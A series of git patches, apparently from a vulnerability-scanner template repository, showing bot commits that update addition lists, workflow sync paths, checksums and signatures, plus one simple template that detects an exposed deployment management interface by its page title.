b/http/misconfiguration/deployment-interface-exposed.yaml @@ -0,0 +1,29 @@ +id: deployment-interface-exposed + +info: + name: Deployment Management Interface - Exposed + author: DhiyaneshDK + severity: medium + description: | + Deployment Management Interface is exposed. This exposure could potentially allow unauthorized access to the management interface + metadata: + verified: true + max-request: 1 + tags: deployment,management,misconfig + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>Deployment Management Interface" + + - type: status + status: + - 200 From b1035e4d652018851a0523e1fe9c7f272c197235 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 29 Jul 2024 09:47:59 +0000 Subject: [PATCH 1707/1841] Auto Generated New Template Addition List [Mon Jul 29 09:47:59 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7a6071b44a..f0de413092 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ http/cves/2023/CVE-2023-44393.yaml http/cves/2024/CVE-2024-6205.yaml http/osint/user-enumeration/substack.yaml +http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml From dd12c8055ee985d1bbcb02c425ca5eebbfd1ad0b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 29 Jul 2024 09:48:53 +0000 Subject: [PATCH 1708/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b159f3b07c..1417c1306e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2023/CVE-2023-44393.yaml' - 'http/cves/2024/CVE-2024-6205.yaml' - 'http/osint/user-enumeration/substack.yaml' + - 'http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 1fec8c5f4c441daa8425cd02897a2a6106f7e814 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 29 Jul 2024 09:49:19 +0000 Subject: [PATCH 1709/1841] Auto Generated Templates Checksum [Mon Jul 29 09:49:19 UTC 2024] :robot: --- templates-checksum.txt | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 727606a9c7..1d27494766 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3526,7 +3526,7 @@ http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26 -http/cves/2024/CVE-2024-6205.yaml:abe35cde7f1ae4324cd919d2c38fced34f8e3054 +http/cves/2024/CVE-2024-6205.yaml:b7365f0543b4c8a4207086dcf8c8eba65bca7a5d http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3 http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 @@ -7871,6 +7871,7 @@ http/vulnerabilities/drupal/drupal-avatar-xss.yaml:1058d534d63fdae5e60b8a97cb170 http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml:9edd51637c886ca03c88cbdedca3033fb842b81e http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml:57ff09d4d4fff6e542ff32d08f76b9e6bf381db7 http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml:8f5cfb4aee686e8c11ebae13cadbc21f89277b97 +http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml:774752d04d6169db3544c00a7a6d55843a093292 http/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml:d1e90625be0514d41048bed71a21e367556b4d4f http/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml:2ef0518658108401b361842897fd0a98f6e6d94d http/vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml:05bbdb4a1987dc14d013b1b33d82c630b4838b79 @@ -7964,6 +7965,7 @@ http/vulnerabilities/jupyter-notebook-rce.yaml:70bde4f2a81cfcd8fa84033dffa5391ec http/vulnerabilities/kkfileview-ssrf.yaml:b957093c1906d85347103238f8fa25ccd6ec75e9 http/vulnerabilities/landray/landray-eis-sqli.yaml:2e13e31d6789037a840228f9dddddf5beff77d24 http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml:8f40ccd19c355cf346830fcdf2e91d6b653f178d +http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml:5f9f47c1f0bdabea597272571aa58bb6623f6275 http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml:55ae9bebeb50e27d2b5400649d133093616a5427 http/vulnerabilities/landray/landray-oa-treexml-rce.yaml:bc66dd3fd8c3965a0217aefe95ea84074f5fd7f6 http/vulnerabilities/laravel/laravel-ignition-xss.yaml:c022357b49e3f882abd8689da81a7b85dc1e27a1 @@ -8697,7 +8699,7 @@ javascript/cves/2020/CVE-2020-7247.yaml:4b69f08fbef74779850f4ef8a81e91bfbf4a387a javascript/cves/2023/CVE-2023-34039.yaml:44c16d645d9008bce58aaff587f1c1780464946c javascript/cves/2023/CVE-2023-46604.yaml:c27b5604c33956e48e94c138aac183c87080d8d3 javascript/cves/2023/CVE-2023-48795.yaml:582b36cd13217b59d522114f7787b8f11ccd5c63 -javascript/cves/2024/CVE-2024-23897.yaml:c91a199da5f2ac965ee9e2210be6299164a1e48f +javascript/cves/2024/CVE-2024-23897.yaml:95cf900b304f4b577f2f6cafc315513a033f71d0 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad javascript/default-logins/redis-default-logins.yaml:94bc6aea27f0f07f41834001f2efd51758a8ac2b @@ -8932,7 +8934,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:15a26310b9e31c3634c678de98decab839645cd0 +templates-checksum.txt:7c790c207e1b38401b5b2573ac7ee4db5ef87a6d vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From ab786cf1c369f74e39cb3987ce2a43a12daed897 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 29 Jul 2024 09:49:42 +0000 Subject: [PATCH 1710/1841] Auto Generated New Template Addition List [Mon Jul 29 09:49:41 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index f0de413092..7c850316b3 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,6 @@ http/cves/2023/CVE-2023-44393.yaml http/cves/2024/CVE-2024-6205.yaml http/osint/user-enumeration/substack.yaml +http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml +http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml From 09d8e1042217927a473bbe13329a3dcaec4ea1e2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 29 Jul 2024 09:49:49 +0000 Subject: [PATCH 1711/1841] Auto Template Signing [Mon Jul 29 09:49:49 UTC 2024] :robot: --- http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml b/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml index 1eb892d1c2..93dbbee213 100644 --- a/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml @@ -62,3 +62,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450220445ca7f1f41ff0884d606be22c0c90214e211d656432ffbcb3d3d0dd366e4f7f022100e065be9f3b3799e4c761efd34f89911dc2d97d65e34178243d9bcff0ffb490af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e690eadc24d88f5282d96b5838154449bf4eda86 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 29 Jul 2024 09:50:34 +0000 Subject: [PATCH 1712/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 1417c1306e..1d707020b1 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,8 @@ on: - 'http/cves/2023/CVE-2023-44393.yaml' - 'http/cves/2024/CVE-2024-6205.yaml' - 'http/osint/user-enumeration/substack.yaml' + - 'http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml' + - 'http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml' - 'http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml' workflow_dispatch: jobs: From e5f2a4d195acd1f15c355f9e337ab3fa709c4cc2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 29 Jul 2024 15:25:58 +0530 Subject: [PATCH 1713/1841] Update landray-oa-replaceextend-rce.yaml --- .../vulnerabilities/landray/landray-oa-replaceextend-rce.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml b/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml index 93dbbee213..efa843fe6c 100644 --- a/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml @@ -58,8 +58,10 @@ http: part: body_2 words: - "{{string}}" + - "Execute" + condition: and - type: status status: - 200 -# digest: 4a0a004730450220445ca7f1f41ff0884d606be22c0c90214e211d656432ffbcb3d3d0dd366e4f7f022100e065be9f3b3799e4c761efd34f89911dc2d97d65e34178243d9bcff0ffb490af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220445ca7f1f41ff0884d606be22c0c90214e211d656432ffbcb3d3d0dd366e4f7f022100e065be9f3b3799e4c761efd34f89911dc2d97d65e34178243d9bcff0ffb490af:922c64590222798bb761d5b6d8e72950 From 1b7c7cee6992a56d3286bfeb117ef53fd70d918c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 29 Jul 2024 09:59:20 +0000 Subject: [PATCH 1715/1841] Auto Generated Templates Checksum [Mon Jul 29 09:59:20 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1d27494766..63b58a9f74 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7872,6 +7872,7 @@ http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml:9edd51637c886ca03 http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml:57ff09d4d4fff6e542ff32d08f76b9e6bf381db7 http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml:8f5cfb4aee686e8c11ebae13cadbc21f89277b97 http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml:774752d04d6169db3544c00a7a6d55843a093292 +http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml:22ad5181b7820a51e772fe4b7360127a19c698a5 http/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml:d1e90625be0514d41048bed71a21e367556b4d4f http/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml:2ef0518658108401b361842897fd0a98f6e6d94d http/vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml:05bbdb4a1987dc14d013b1b33d82c630b4838b79 @@ -7965,7 +7966,7 @@ http/vulnerabilities/jupyter-notebook-rce.yaml:70bde4f2a81cfcd8fa84033dffa5391ec http/vulnerabilities/kkfileview-ssrf.yaml:b957093c1906d85347103238f8fa25ccd6ec75e9 http/vulnerabilities/landray/landray-eis-sqli.yaml:2e13e31d6789037a840228f9dddddf5beff77d24 http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml:8f40ccd19c355cf346830fcdf2e91d6b653f178d -http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml:5f9f47c1f0bdabea597272571aa58bb6623f6275 +http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml:e32f8a93ca14a3e2f0a75ccd617cd46e558a9825 http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml:55ae9bebeb50e27d2b5400649d133093616a5427 http/vulnerabilities/landray/landray-oa-treexml-rce.yaml:bc66dd3fd8c3965a0217aefe95ea84074f5fd7f6 http/vulnerabilities/laravel/laravel-ignition-xss.yaml:c022357b49e3f882abd8689da81a7b85dc1e27a1 @@ -8934,7 +8935,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7c790c207e1b38401b5b2573ac7ee4db5ef87a6d +templates-checksum.txt:bab8bb351bc19c56a89fe9ca41a58e2843b3e15b vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 366f00b9e3ffd55630f635e75925881390067be0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 29 Jul 2024 10:01:00 +0000 Subject: [PATCH 1716/1841] Auto Template Signing [Mon Jul 29 10:00:59 UTC 2024] :robot: --- .../esafenet/esafenet-netsecconfigajax-sqli.yaml | 1 + http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml | 1 + http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml | 2 +- 3 files changed, 3 insertions(+), 1 deletion(-) diff --git a/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml index 6d9097fe21..3fd5f7c79e 100644 --- a/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml +++ b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml @@ -29,3 +29,4 @@ http: - 'contains(body,"操作成功")' - 'status_code == 200' condition: and +# digest: 490a0046304402200d661ef351e46745e95858f066515919d01ac3c33df6ebdf8713b90322df8e2802201bfd4eac3b4e3fb51a1e8797fea37efee4756737acf9ef39b8781bb7625bf968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml b/http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml index 0b4294344e..596fc82563 100644 --- a/http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml +++ b/http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml @@ -33,3 +33,4 @@ http: - 'contains(body,"OK")' - 'status_code == 200' condition: and +# digest: 490a00463044022009c985318bd9f91927035c5788f4c5f73f14ae4f1ac1dd60090bdf0b22cf88ff02204e704959ef142792827df00a87364d1d86f7245d5561f6556b17042309d0de2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml b/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml index efa843fe6c..51c3faf756 100644 --- a/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220445ca7f1f41ff0884d606be22c0c90214e211d656432ffbcb3d3d0dd366e4f7f022100e065be9f3b3799e4c761efd34f89911dc2d97d65e34178243d9bcff0ffb490af:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100de7ecf869efb8528fe638e5f4bd1ea14cd0b912aff4dd1d8399178735a538184022100cd9ddac9f7cae0032de5483f093c03d58920819d06593ca15cfeb2e859a82075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fed1201b5ed1c7043e8a5f77f4fa6d62d7d2edae Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 29 Jul 2024 10:02:24 +0000 Subject: [PATCH 1717/1841] Auto Generated New Template Addition List [Mon Jul 29 10:02:24 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7c850316b3..319a9a0f92 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cves/2023/CVE-2023-44393.yaml http/cves/2024/CVE-2024-6205.yaml +http/misconfiguration/deployment-interface-exposed.yaml http/osint/user-enumeration/substack.yaml http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml From f532d9e5ed623ada1e802a12af557631e814f409 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 29 Jul 2024 10:02:33 +0000 Subject: [PATCH 1718/1841] Auto Generated Templates Checksum [Mon Jul 29 10:02:33 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 63b58a9f74..ca1119b55e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5576,6 +5576,7 @@ http/misconfiguration/debug/flask-werkzeug-debug.yaml:2ee39793313fdfb9340f8b4e10 http/misconfiguration/debug/github-debug.yaml:8b7877fb514fe7ad888fb42aac36c21b36e5fe1d http/misconfiguration/default-spx-key.yaml:e787797b3c09a0f5c03a14cbf2cc2cc7280d2736 http/misconfiguration/deos-openview-admin.yaml:51a5586a8abec23b8177b2ab9a3bdfe9d21b1796 +http/misconfiguration/deployment-interface-exposed.yaml:d6ffe0c48adb595f7b5610ed7f9d785bff381816 http/misconfiguration/dgraph-dashboard-exposure.yaml:f78d8b451116601b9669874f446e1e0288c0200b http/misconfiguration/django-debug-detect.yaml:e7c45908268a0883ef221e205124b251307d5a64 http/misconfiguration/dlink-config-dump.yaml:a03aa2655a8a532b17f35a3359a8619cab72b3d2 @@ -7871,8 +7872,8 @@ http/vulnerabilities/drupal/drupal-avatar-xss.yaml:1058d534d63fdae5e60b8a97cb170 http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml:9edd51637c886ca03c88cbdedca3033fb842b81e http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml:57ff09d4d4fff6e542ff32d08f76b9e6bf381db7 http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml:8f5cfb4aee686e8c11ebae13cadbc21f89277b97 -http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml:774752d04d6169db3544c00a7a6d55843a093292 -http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml:22ad5181b7820a51e772fe4b7360127a19c698a5 +http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml:5f6728dfe6517bbc52b8ffc03eef7ec444f6bef2 +http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml:1e213b3e4c9b482958e5afaa99cbbe29f658f297 http/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml:d1e90625be0514d41048bed71a21e367556b4d4f http/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml:2ef0518658108401b361842897fd0a98f6e6d94d http/vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml:05bbdb4a1987dc14d013b1b33d82c630b4838b79 @@ -7966,7 +7967,7 @@ http/vulnerabilities/jupyter-notebook-rce.yaml:70bde4f2a81cfcd8fa84033dffa5391ec http/vulnerabilities/kkfileview-ssrf.yaml:b957093c1906d85347103238f8fa25ccd6ec75e9 http/vulnerabilities/landray/landray-eis-sqli.yaml:2e13e31d6789037a840228f9dddddf5beff77d24 http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml:8f40ccd19c355cf346830fcdf2e91d6b653f178d -http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml:e32f8a93ca14a3e2f0a75ccd617cd46e558a9825 +http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml:40648dd6896550d1c20f30de0d09e69d05727989 http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml:55ae9bebeb50e27d2b5400649d133093616a5427 http/vulnerabilities/landray/landray-oa-treexml-rce.yaml:bc66dd3fd8c3965a0217aefe95ea84074f5fd7f6 http/vulnerabilities/laravel/laravel-ignition-xss.yaml:c022357b49e3f882abd8689da81a7b85dc1e27a1 @@ -8935,7 +8936,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:bab8bb351bc19c56a89fe9ca41a58e2843b3e15b +templates-checksum.txt:8a915ebfc72ba1d1de9d658d0a6f788b2e8fcb63 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 09e3469cc255fb3e6a451feac81c8a0ac0948d20 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 29 Jul 2024 10:03:13 +0000 Subject: [PATCH 1719/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 1d707020b1..c0d1f8fc65 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cves/2023/CVE-2023-44393.yaml' - 'http/cves/2024/CVE-2024-6205.yaml' + - 'http/misconfiguration/deployment-interface-exposed.yaml' - 'http/osint/user-enumeration/substack.yaml' - 'http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml' - 'http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml' From 51b72d0184e52c4374e95a02b961df3da218ef5d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 29 Jul 2024 10:04:15 +0000 Subject: [PATCH 1720/1841] Auto Template Signing [Mon Jul 29 10:04:15 UTC 2024] :robot: --- http/misconfiguration/deployment-interface-exposed.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/deployment-interface-exposed.yaml b/http/misconfiguration/deployment-interface-exposed.yaml index 7442c46ba0..0ed2a87e6f 100644 --- a/http/misconfiguration/deployment-interface-exposed.yaml +++ b/http/misconfiguration/deployment-interface-exposed.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100d358167bb7a0ef9ceb058f53d3781cea2f2b12a84590e2fef1fd199073a6de4e02205040b1ed5c89a64f94e43860963f62e49db70866e63e61d2b7dc319540b28ca6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 2258d15b1f5c10ccf4054f900b79b399bf5dc652 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 29 Jul 2024 14:39:13 +0000 Subject: [PATCH 1722/1841] Auto Generated Templates Checksum [Mon Jul 29 14:39:13 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ca1119b55e..a217adc02f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5576,7 +5576,7 @@ http/misconfiguration/debug/flask-werkzeug-debug.yaml:2ee39793313fdfb9340f8b4e10 http/misconfiguration/debug/github-debug.yaml:8b7877fb514fe7ad888fb42aac36c21b36e5fe1d http/misconfiguration/default-spx-key.yaml:e787797b3c09a0f5c03a14cbf2cc2cc7280d2736 http/misconfiguration/deos-openview-admin.yaml:51a5586a8abec23b8177b2ab9a3bdfe9d21b1796 -http/misconfiguration/deployment-interface-exposed.yaml:d6ffe0c48adb595f7b5610ed7f9d785bff381816 +http/misconfiguration/deployment-interface-exposed.yaml:f438b3241ae601563642248a88f7f655eb30eeef http/misconfiguration/dgraph-dashboard-exposure.yaml:f78d8b451116601b9669874f446e1e0288c0200b http/misconfiguration/django-debug-detect.yaml:e7c45908268a0883ef221e205124b251307d5a64 http/misconfiguration/dlink-config-dump.yaml:a03aa2655a8a532b17f35a3359a8619cab72b3d2 @@ -5880,7 +5880,7 @@ http/misconfiguration/ms-exchange-user-enum.yaml:844709108afd1659791b731226dc62a http/misconfiguration/multilaser-pro-setup.yaml:6b10ca82ce94dd55a2b28df9cc37d5d9e5fb2951 http/misconfiguration/mysql-history.yaml:b689b55a94972ee72a19f194d6fd2102d0bc52e0 http/misconfiguration/mysqld-exporter-metrics.yaml:6678116c0c58986fd7999328a503a9f34c7212b4 -http/misconfiguration/nacos/nacos-create-user.yaml:33a4e0acc2c0d482dd267b3bd4cc3c143bb6ca6d +http/misconfiguration/nacos/nacos-create-user.yaml:17d971a528a78f5d83ea96b0f814c02c3e306b40 http/misconfiguration/nacos-authentication-bypass.yaml:4900d302c6a62ade0fc27e6c2aebd1c34bffee6a http/misconfiguration/namedprocess-exporter-metrics.yaml:65b4e83040f5a0e2ac2cd0cb8d055384440d62e0 http/misconfiguration/nextcloud-install.yaml:e1781be78fcc3ec76e7718e3031cc01cab4c355a @@ -8936,7 +8936,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8a915ebfc72ba1d1de9d658d0a6f788b2e8fcb63 +templates-checksum.txt:b2dd8d28e74c0972efe9c8af0418772479a4e5c9 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From d4df42f96223fccf01d213f76dc35b29a4001a1f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 29 Jul 2024 14:41:00 +0000 Subject: [PATCH 1723/1841] Auto Template Signing [Mon Jul 29 14:41:00 UTC 2024] :robot: --- http/misconfiguration/nacos/nacos-create-user.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/nacos/nacos-create-user.yaml b/http/misconfiguration/nacos/nacos-create-user.yaml index 462c2d9bff..19acb1a788 100644 --- a/http/misconfiguration/nacos/nacos-create-user.yaml +++ b/http/misconfiguration/nacos/nacos-create-user.yaml @@ -38,4 +38,4 @@ http: - "status_code_1 == 200 && contains(body_1,'create user ok!')" - "status_code_3 == 200 && contains(body_3,'delete user ok!')" condition: and -# digest: 4a0a00473045022010f9ace78faa4086f5fe639b25b96307833ce21a84afa4592bd970e37168d6cb0221009c05e9cf9de63c5bc15036356db9ec547aaba725c4397daf4ab46c985341d5ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022035dd3e81460a17dce5f817479772130279b295687fd12cf6a77a263c479abbb40220781474ffa64fc9ac8255b1c830542d9acdd106252296def591965d3ec41aef3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From cd0dfd3d24b0a6d6f29f0f5039a7f35be0ebbb46 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 29 Jul 2024 20:49:29 +0530 Subject: [PATCH 1724/1841] Rename CVE-2024-6746.yaml to CVE-2024-6746.yaml --- {network => http}/cves/2024/CVE-2024-6746.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename {network => http}/cves/2024/CVE-2024-6746.yaml (99%) diff --git a/network/cves/2024/CVE-2024-6746.yaml b/http/cves/2024/CVE-2024-6746.yaml similarity index 99% rename from network/cves/2024/CVE-2024-6746.yaml rename to http/cves/2024/CVE-2024-6746.yaml index df1bc64da9..c44ae78ba3 100644 --- a/network/cves/2024/CVE-2024-6746.yaml +++ b/http/cves/2024/CVE-2024-6746.yaml @@ -52,4 +52,4 @@ http: - 'contains_all(body,"bit app support","fonts","extensions")' - 'status_code == 200' condition: and -# digest: 